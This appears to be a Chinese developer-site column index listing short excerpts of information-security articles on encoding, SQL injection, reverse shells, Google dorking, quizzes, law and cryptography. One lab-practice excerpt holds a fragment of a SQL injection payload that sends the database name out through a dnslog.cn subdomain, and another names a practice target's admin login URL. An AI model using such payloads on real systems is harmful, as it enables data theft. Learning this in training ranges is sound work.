首页
AI Coding
NEW
沸点
课程
直播
活动
AI刷题
APP
插件
搜索历史
清空
创作者中心
写文章
发沸点
写笔记
写代码
草稿箱
创作灵感
查看更多
会员
登录
注册
信息安全
sparename
创建于2022-10-08
订阅专栏
信息安全网络安全相关内容
暂无订阅
共45篇文章
创建于2022-10-08
订阅专栏
默认顺序
默认顺序
最早发布
最新发布
misc总结
base64最多只能隐藏2个=号(大写字母,小写字母,数字),base32最多6个=号(字母A-Z,数字2-7,只有大写),base16(16进制转换,数字0-9,字母A-F) \x——shellcode编码,十六进制加了个\x,本质上为十六进制,放进hex解密 XXencode...
无java环境安装burpsuite
下载jdkjdk-11.0.下载burpburpsuite_community_v2021.8.4.burpsuite.bat写一个burpsuite.txt文件burpsuite.jdk-11.0.burpsuite_community_v2021.8.4.burpsuite....
反弹shell
Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。Ken Thompson 的 sh 是第一种 Unix...
CTFHub——技能树——SQL注入(sqlmap)
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询...
网络精英赛模拟练习(3)
(单选题,1分) A. B. C. D. A. B. C. D. (单选题,1分) A. B. C. D. A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A....
网络精英赛模拟练习(4)
A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. A. B. C. D. (单选题,1分) A. B. C. D. (单选题,1分) A. B. C. D. A. B. C. D. A. B. C. D. (单选题,1分)...
信息安全法律法规
◆保护国家秘密相关法律 ◆《保守国家秘密法》、《刑法》、《全国人民代表大会常务委员会关于维护互联网安全的决定》等 《保守国家秘密法》 ◆主旨(总则) ◆目的:保守国家秘密,维加国家安全和利益 ◆国家秘密受法律保护,一切单位和公民都有保守国家秘密的义务 ◆国家保密行政管理部门主管全...
通过搜索引擎快速寻找漏洞
搜索引擎大家日常都会用到,它能够帮助我们获取信息,常见的搜索引擎有:百度,谷歌,360,搜狗,必应等等 而谷歌语法就是利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 谷歌语法基础的符号: 谷歌语法基础的符号: “xxx”:将要搜索的关键字用引号括起来 (表示完全匹配,即关键词...
kali2021切换python版本
> update-alternatives --install /usr/bin/python python /usr/bin/python3 150 update-alternatives: using /usr/bin/python3 to provide /usr/bin/...
封神台练习
点击Gey SubDomain,得到d2kez7.dnslog.1+and+(select+load_file(concat('//',(select+database()limit+0,1),'.d2kez7.dnslog.cn/1.1+and+(select+load_fil...
信息安全的概述
◆信息奠基人香浓认为:信息是用来消除随机不确定性的东西。 ◆信息是食物运动状态或存在方式的不确定性的描述。 ◆信息是具体的,并且可以被人(生物、机器等)所感知、提取、识别、可以被传递、储存、变换、处理、显示、检索和利用。 信息来源于物质,又不是物质本身;它从物质的运动中产生出来,...
移动智能终端安全防护
◆移动终端或者叫移动通信终端是指可以在移动中使用的计算机设备,广义的讲包括手机、笔记本、平板电脑、POS机甚至包括车载电脑。但是大部分情况下是指手机或者具有多种应用功能的智能手机以及平板电脑。随着网络和技术朝着越来越宽带化的方向的发展,移动通信产业将走向真正的移动信息时代。另一方...
密码学基础
5.1 密码学基本概念5.2 对称密码算法5.3 非对称密码算法5.4 其他密码服务5.5.密码学形成与发展 ◆古典密码学(1949年之前) ◆主要特点:数据的安全基于算法的保密 ◆近代密码学(1949~1975年) ◆主要特点:密码学真正成为]科学 ◆现代密码学(1976年以后...
虚拟机DEDECMS织梦建站
win7专业版虚拟机下载安装进虚拟机下载系统组件VC9、VC11、VC14等运行库下载链接:[phpstudy2018](https://www.xp.cn/download.html)搭建站点打开host添加站点查看虚拟机ip用NTA模式(与主机共享ip)编辑虚拟网络NTA设置...
信息安全基础技术
◆数据加密是指将明文信息采取数学方法进行函数转换成密文,只有特定接收方才能将其解密还原成明文的过程 ◆数据加密主要涉及三要素:明文、密钥、密文。 ◆明文( Plain Text):被隐蔽的原始消息,通常用m表示; ◆密文( Cipher Text):隐蔽后的消息,通常用c表示; ...
网络精英赛模拟练习(2)
1、 会话侦听与劫持技术属于()技术。(单选题,1分) A. B. C. D. 回答正确(得分: 1分) 正确答案 B 解析 会话侦听与劫持技术属于协议漏洞渗透技术。2、 溢出攻击的核心是()。A. B. C. D. (单选题,1分) A. B. C. D. 回答正确(得分: 1...
物理安全
1.2.3.4.1.◆了解物理安全的重要性; ◆了解如何通过环境设计来预防犯罪; ◆了解如何科学地制定物理安全计划; 物理环境安全 物理安全包含哪些内容 ◆物理安全是保护信息稳定、可靠的运行,确保信息系统在对信息进行采集、传输、存储、处理等过程中不会因为自然因素、人为因素等原因导...
尤里的复仇Ⅰ 小芳!
http://59.63.200.http://59.63.200.http://59.63.200.79:8004/shownews.可以用御剑查找登入后台: http://59.63.200.79:8004/admin/login.
网络安全防护技术
◆传输控制协议困特网互联协议( Transmission Control Protocol/Internet Protocol,TCPP)是目前因特网中使用最广泛的协议。 ◆目前因特网使用的是IPv4。IPv6是由互联网工程任务组( Internet Engineering Ta...
操作系统安全防护
◆操作系统( Operating System,OS)是计算机系统软硬件资源的控制中心,它以尽量合理有效的方法组织多个用户程序共享计算机的各种资源。 ◆有效( efficient):系统效率,资源利用率(如:CPU利用的充足与否,内存、外部设各是否忙碌) ◆合理:公平与否,如果不...
下一页